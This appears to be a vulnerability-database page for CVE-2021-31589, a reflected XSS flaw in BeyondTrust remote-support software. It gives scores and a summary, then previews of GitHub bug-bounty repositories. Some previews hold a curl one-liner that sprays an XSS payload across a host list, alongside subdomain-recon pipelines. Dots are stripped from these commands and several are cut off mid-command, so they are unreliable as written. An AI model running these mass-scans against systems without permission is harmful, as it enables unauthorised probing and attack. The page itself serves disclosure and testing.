4.3
CVSSv2

CVE-2021-31589

Published: 05/01/2022 Updated: 07/02/2022
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 6.1 | Impact Score: 2.7 | Exploitability Score: 2.8
VMScore: 385
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

A cross-site scripting (XSS) vulnerability has been reported and confirmed for BeyondTrust Secure Remote Access Base Software version 6.0.1 and older, which allows the injection of unauthenticated, specially-crafted web requests without proper sanitization.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

beyondtrust appliance base software

Exploits

BeyondTrust Remote Support versions 60 and below suffer from a cross site scripting vulnerability ...

Github Repositories

One-Line-Bug-Bounty #Nuclei : subfinder -d targetcom | httpx | nuclei -t nuclei-templates #[CVE-2021-31589] cat substxt | while read host do; do curl -sk "$host/appliance/loginns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(documentdomain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/

one-liner CVE-2021-31589 BeyondTrust Remote Support Reflected XSS @ghostxsec cat substxt | while read host do; do curl -sk "$host/appliance/loginns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(documentdomain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(documentdomain)

A collection oneliner scripts for bug bounty

Oneliner-Bugbounty A collection oneliner scripts for bug bounty List tools Subfinder Naabu httpx Nuclei Waybackurls DNSProbe gf sqlmap qsreplace hakrawler Puredns GauPlus uro Auto scanner subfinder -d sitecom -all | naabu | httpx | nuclei -t nuclei-templates Finding files (For example in here json file) subfinder -d sitecom -all | naa

Oneliner-Bugbounty A collection oneliner scripts for bug bounty List tools Subfinder Naabu httpx Nuclei Waybackurls DNSProbe gf sqlmap qsreplace hakrawler Puredns GauPlus uro Auto scanner subfinder -d sitecom -all | naabu | httpx | nuclei -t nuclei-templates Finding files (For example in here json file) subfinder -d sitecom -all | naa

CVE-2021-31589 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.

Badges License MIT Installation Install cve-2021-31589 with npm npm install cve-2021-31589 -g Usage Example for single url cve-2021-31589 -u examplecom Usage Example for list of urls cve-2021-31589 -l urlstxt -o outtxt Screenshots Help menu Ge